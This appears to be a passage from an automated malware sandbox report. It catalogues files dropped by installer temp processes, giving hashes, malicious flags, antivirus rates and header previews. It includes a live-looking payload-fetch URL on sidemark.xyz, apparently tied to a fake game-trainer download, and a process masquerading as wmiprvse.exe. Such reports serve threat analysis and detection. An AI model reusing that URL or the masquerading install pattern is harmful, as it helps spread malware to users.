                                                                                                                                                                                                                                                                        Preview:[Hit {1A632175-46B4-4280-95B2-4C0431511343}]..Queue Time = 0..Hit Type = lifecycle..Life control = end..Life status = success..Protocol Version = 3..Application ID = 57bec79515c1ec525f8858bf..Application Version = 1.0.0..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {127393DE-997B-4FEB-A721-CD60F5521273}..
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):13304
                                                                                                                                                                                                                                                                        Entropy (8bit):5.398843362938325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:kliXXkSNrTolTcbd7I07C5GxEqBw0s0XnkaOkxTQmInLinhABn5In1pYE+kEoEXx:kIN00dsx5CLz75NpMiYQ0Rz
                                                                                                                                                                                                                                                                        MD5:EDF6E4CF9DCC602F764EF15747175E28
                                                                                                                                                                                                                                                                        SHA1:E4A34E6524F960BFFE3ED13CAD909BEEFE518ED4
                                                                                                                                                                                                                                                                        SHA-256:9B8367CD3435886A58E3FA95ACF644BC27C55E2D24A9A4C0B4BB3508FC6E3068
                                                                                                                                                                                                                                                                        SHA-512:20720809AC12F4E3994CC85D8D0A1DAC438FBBBE9378C5655254CE608CA47EB6971D2A9DFE8C27317D6B9743CED7BF95A52D82E1D84C10E23838BE128E50511F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[Hit {BF84B307-55F8-472C-A444-E128EB77902D}]..Queue Time = 0..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 57bec79515c1ec525f8858bf..Application Version = 1.0.0..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {B1814F1C-5BBA-428D-BCAE-B6CCA32E5E4A}....[Hit {8EC87A13-1733-48AE-8D6D-2915EE4BF2B2}]..Queue Time = 0..Hit Type = property..Label = VersionNT..Value = 1000..Protocol Version = 3..Application ID = 57bec79515c1ec525f8858bf..Application Version = 1.0.0..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {B1814F1C-5BBA-428D-BCAE-B6CCA32E5E4A}....[Hit {E3C538DA-1C47-48AC-9086-4EB71872E01D}]..Queue Time = 0..Hit Type = property..Label = VersionNT64..Value = 1000..Protocol Version = 3..Application ID = 57bec79515c1ec525f8858bf..Application Version = 1.0.0..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {B1814F1C-5BBA-428D-BCAE-B6CCA32E5E4A}....[Hit {4B34E980-3814-4CE3-9ABA-6FF88699C206}]..Queue
                                                                                                                                                                                                                                                                        Process:C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                        Entropy (8bit):3.202819531114783
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:avXGS4f:aO1
                                                                                                                                                                                                                                                                        MD5:2C058EBACB1F52A22B32F432C8F83C24
                                                                                                                                                                                                                                                                        SHA1:D3F03BFB7A8843A7FA5E0A17065429DD9B41591C
                                                                                                                                                                                                                                                                        SHA-256:196096D1EC38523F3B28A201B214A22D24602A2EFEB5181E11FC503FBF298529
                                                                                                                                                                                                                                                                        SHA-512:849EF2428867E5F9DDB4F7297782B752D73E7A895DE808E9AF6A85911263859AE1117AD8C4CF07BDF714EBADC922344EE74722DC3884AC19DB100EAFFE5A29E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:38.9072,-77.0369
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):536592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427124970627738
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:s32hV/GguOWuGAtLppJZZ5QNIwqKljoMA3KzAOXalOHZRrQinqR/S:m2hV/BGgpV3QWyjwmklOHZ3nq5S
                                                                                                                                                                                                                                                                        MD5:6EA65025106536EB75F026E46643B099
                                                                                                                                                                                                                                                                        SHA1:D6F5801E370C92D8E5C2336B4022CC6CB6EC1F99
                                                                                                                                                                                                                                                                        SHA-256:DAE76CCE74D63E7935FDE4383020659D75B68632F8A01F2053EC895E69BB4EFB
                                                                                                                                                                                                                                                                        SHA-512:062AED4C7541346B7338E1D234A50AA9AF76F103A65268BA65A42508A26C10CC27CCFCE6131485403AFA36D8A8CD69F3BF1E55CD1A1F675357B87228AACBB988
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<...?...<...9.u.<...8...<...?...<...9...<...8...<...:...<...=...<...=.m.<.^.5...<.^.<...<.^....<.....<.^.>...<.Rich..<.........PE..L...Z.gb.........."!.........................................................P............@.........................P...(...x...,...............................0Z......p...............................@...............(............................text............................... ..`.rdata..............................@..@.data...t"..........................@....rsrc...............................@..@.reloc..0Z.......\..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):935952
                                                                                                                                                                                                                                                                        Entropy (8bit):6.465848738967934
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:w327CUJc4RQ8Btk8Y5EiwB4aNXVW+hv+AhiC:cAc4RQ8BtDAoB4aNXVW+hv+AhiC
                                                                                                                                                                                                                                                                        MD5:91D4A8C2C296EF53DD8C01B9AF69B735
                                                                                                                                                                                                                                                                        SHA1:AD2E5311A0F2DBBA988FBDB6FCF70034FDA3920D
                                                                                                                                                                                                                                                                        SHA-256:A787E7A1AD12783FCBF3F853940590329E0FF0DDDF17282324F2D95ED6408F23
                                                                                                                                                                                                                                                                        SHA-512:63C5506A55DEA2B3BD1C99B79B5668F5AFC0104564E92F07AFB42F2F2B67EAE9D0E0174CB36E6095A27A6C71496206042079B6E5A2B2FF787F3CB9EF20995E9E
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:b..[...[...[..7)...[..7)..Q[..#...[..#...[..#..[..7)...[..7)...[...[...Z..d"...[..d"...[..d"...[...[...[..d"...[..Rich.[..........PE..L...!.gb.........."!................ ........................................p......,.....@.........................0|..t....|.......`...............*.......p.......,..p...................@-.......+..@............................................text...N........................... ..`.rdata..T...........................@..@.data...T............x..............@....rsrc........`.......,..............@..@.reloc.......p.......2..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                                                        Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5135320
                                                                                                                                                                                                                                                                        Entropy (8bit):7.8968119558461325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:98304:ykLcpls+yc8Gr0ZjL7uWOm6qCNqjdySicpxXHR1fSd2x1t29s4C1eH9R:dcPs+ycFI5LasRCIDDHRdPt5o9R
                                                                                                                                                                                                                                                                        MD5:8657D8F7608F1E03726F5B0256869C66
                                                                                                                                                                                                                                                                        SHA1:48DAAFF8F1D014935AE4FDE09159F3A1FACC59C5
                                                                                                                                                                                                                                                                        SHA-256:8CBD1F1A5462EE8FD5532C3DA36FBB62F409F3477DE5A9C7F6404B1D68A6D647
                                                                                                                                                                                                                                                                        SHA-512:82D61C0C405633927DE575037853C30ADC1C8655BEBFB78CFEE3C6B7999ABF0D5F83A426659AE779D5F8F8B6E38AB0AB961EC57723C081946D8F2A435989B8AC
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................R...^.......^.......p....@.......................................@......@...................@....... .......p.......................................................`......................."..T....0.......................text....9.......:.................. ..`.itext.......P.......>.............. ..`.data....7...p...8...V..............@....bss.....m...............................idata....... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                        MD5:444BCB3A3FCF8389296C49467F27E1D6
                                                                                                                                                                                                                                                                        SHA1:7A85F4764BBD6DAF1C3545EFBBF0F279A6DC0BEB
                                                                                                                                                                                                                                                                        SHA-256:2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF
                                                                                                                                                                                                                                                                        SHA-512:9FBBBB5A0F329F9782E2356FA41D89CF9B3694327C1A934D6AF2A9DF2D7F936CE83717FB513196A4CE5548471708CD7134C2AE99B3C357BCABB2EAFC7B9B7570
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:ok
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):152
                                                                                                                                                                                                                                                                        Entropy (8bit):5.450961215679423
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:N1KNMBwFfOYKrZK3VVeR3hX/+39EgisUHHOW8dfD9/QVomUdnU:CemFfH3V4E39WJ5sJ/NdU
                                                                                                                                                                                                                                                                        MD5:9B2B1A18864699EF1ABF88166856C51C
                                                                                                                                                                                                                                                                        SHA1:C232CA7ED6B95CA760D233B7A8E77CD07A2CBCE1
                                                                                                                                                                                                                                                                        SHA-256:C2DD7D5E353CE47745640112598A15FB94B88019AA87EC052ADF9D205D33695C
                                                                                                                                                                                                                                                                        SHA-512:0C1D414ED6B72E2EF3217AD39E6AD3D9AF460987C3FA29F245A36E79124EA9A8F424F2FF868BC367F6E44DAA0D6DF83CE99D813489D5A69D7CEBB1331303CB38
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:http://sidemark.xyz/pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701869581
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                                                        Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):11087839
                                                                                                                                                                                                                                                                        Entropy (8bit):7.970064712035176
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:196608:dUYE3u0TBI+XtXkIuujvX2yIo+DHA/wiSXM4YwWu/wjpC1SR/tt5o9S:qYuuI9XKIuuTbznYMtIWESRBo9S
                                                                                                                                                                                                                                                                        MD5:5AFE9D5A2BCC39B1E0573A77EFBE82B7
                                                                                                                                                                                                                                                                        SHA1:30D663A3516B4D34033DCF9FE7CE86FBA7D1299B
                                                                                                                                                                                                                                                                        SHA-256:C1076F9C4A3C06759B21E0E138DD640B2E5412DB4EA4EE16D7E9A0ABF663D25C
                                                                                                                                                                                                                                                                        SHA-512:A72C40355C391C3C1A4D64BBBB8CF7F9B46E62F804A04FFD843FE5EF313408E01BEC0E09D9777CBEC0780FFCFD83A070FA02D0C58F405D89E356FE143073DC5A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................R...^.......^.......p....@.......................................@......@...................@....... .......p.......................................................`......................."..T....0.......................text....9.......:.................. ..`.itext.......P.......>.............. ..`.data....7...p...8...V..............@....bss.....m...............................idata....... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4724720
                                                                                                                                                                                                                                                                        Entropy (8bit):7.0944141075328115
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:98304:5YoIz3Q2HM5Qp4WzMIaX8/BG6v/gIV0sba5mFkDzLb:5i3QDCpQaJGkDegFwL
                                                                                                                                                                                                                                                                        MD5:FA24733F5A6A6F44D0E65D7D98B84AA6
                                                                                                                                                                                                                                                                        SHA1:51A62BEAB55096E17F2E17F042F7BD7DEDABF1AE
                                                                                                                                                                                                                                                                        SHA-256:DA1B144B5F908CB7E811489DFE660E06AA6DF9C9158C6972EC9C79C48AFACB7E
                                                                                                                                                                                                                                                                        SHA-512:1953201D8CD448AA7D23C3E57665546ACE835F97C8CC8D0F323573CEF03A6F317F86C7C3841268ECE1760B911C67845D7E6AA198A44F720DCA02A5A8BCB8E21E
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............S...S...SA..R...SA..R+..SA..R...S...R...S...R...S...R...SA..R...SA..R...SA..R...S...SO..S...R..S..=S...S..US...S...R...SRich...S................PE..L...G.gb..........".......!.........D.........!...@.........................../.....'.H...@.................................$.*.(.....*.............x.G.x.....-..[....$.p.....................$.......!.@.............!.......).`....................text.....!.......!................. ..`.rdata..di....!..j....!.............@..@.data.......0*..j....*.............@....rsrc.........*.......*.............@..@.reloc...[....-..\...D-.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1247744
                                                                                                                                                                                                                                                                        Entropy (8bit):7.135582921236954
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8aoikEZkukudi:sTvC/MTQYxsWR7aoiFZku9
                                                                                                                                                                                                                                                                        MD5:3372EE41B0B68A033CD0EA3120594E29
                                                                                                                                                                                                                                                                        SHA1:95288871FC18757C059A0E65F1EF914F598A8D9F
                                                                                                                                                                                                                                                                        SHA-256:DFD60B6870FFAE5BB75606F007FA2D70247280EBF08B165F8B05677BB83B5247
                                                                                                                                                                                                                                                                        SHA-512:05812A0EC12EA9E76E196FFE384C9950D9D47B55BA6E24F2A75206D7B67ACCD00590C67F9EDA8990826889B8779DC75AE0250EA600892C227F32469144801F67
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...D.je.........."..........Z......w.............@..........................`............@...@.......@.....................d...|....@..$........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...$....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):237568
                                                                                                                                                                                                                                                                        Entropy (8bit):6.42067568634536
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
                                                                                                                                                                                                                                                                        MD5:55C310C0319260D798757557AB3BF636
                                                                                                                                                                                                                                                                        SHA1:0892EB7ED31D8BB20A56C6835990749011A2D8DE
                                                                                                                                                                                                                                                                        SHA-256:54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
                                                                                                                                                                                                                                                                        SHA-512:E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3
                                                                                                                                                                                                                                                                        Entropy (8bit):1.584962500721156
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:F:F
                                                                                                                                                                                                                                                                        MD5:EFF5BC1EF8EC9D03E640FC4370F5EACD
                                                                                                                                                                                                                                                                        SHA1:92A949FD41844E1BB8C6812CDEA102708FDE23A4
                                                                                                                                                                                                                                                                        SHA-256:DC51B8C96C2D745DF3BD5590D990230A482FD247123599548E0632FDBF97FC22
                                                                                                                                                                                                                                                                        SHA-512:672F8FF4AE8530DE295F9DD963724947841E6277EDEC3B21820B5E44D0A64BAEF90FB04E22048028453D715F79357ACC5BD2D566FE6EDE65F981BA3DDA06BAE4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:ok.
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                        MD5:444BCB3A3FCF8389296C49467F27E1D6
                                                                                                                                                                                                                                                                        SHA1:7A85F4764BBD6DAF1C3545EFBBF0F279A6DC0BEB
                                                                                                                                                                                                                                                                        SHA-256:2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF
                                                                                                                                                                                                                                                                        SHA-512:9FBBBB5A0F329F9782E2356FA41D89CF9B3694327C1A934D6AF2A9DF2D7F936CE83717FB513196A4CE5548471708CD7134C2AE99B3C357BCABB2EAFC7B9B7570
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:ok
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                        MD5:444BCB3A3FCF8389296C49467F27E1D6
                                                                                                                                                                                                                                                                        SHA1:7A85F4764BBD6DAF1C3545EFBBF0F279A6DC0BEB
                                                                                                                                                                                                                                                                        SHA-256:2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF
                                                                                                                                                                                                                                                                        SHA-512:9FBBBB5A0F329F9782E2356FA41D89CF9B3694327C1A934D6AF2A9DF2D7F936CE83717FB513196A4CE5548471708CD7134C2AE99B3C357BCABB2EAFC7B9B7570
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:ok
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                        MD5:444BCB3A3FCF8389296C49467F27E1D6
                                                                                                                                                                                                                                                                        SHA1:7A85F4764BBD6DAF1C3545EFBBF0F279A6DC0BEB
                                                                                                                                                                                                                                                                        SHA-256:2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF
                                                                                                                                                                                                                                                                        SHA-512:9FBBBB5A0F329F9782E2356FA41D89CF9B3694327C1A934D6AF2A9DF2D7F936CE83717FB513196A4CE5548471708CD7134C2AE99B3C357BCABB2EAFC7B9B7570
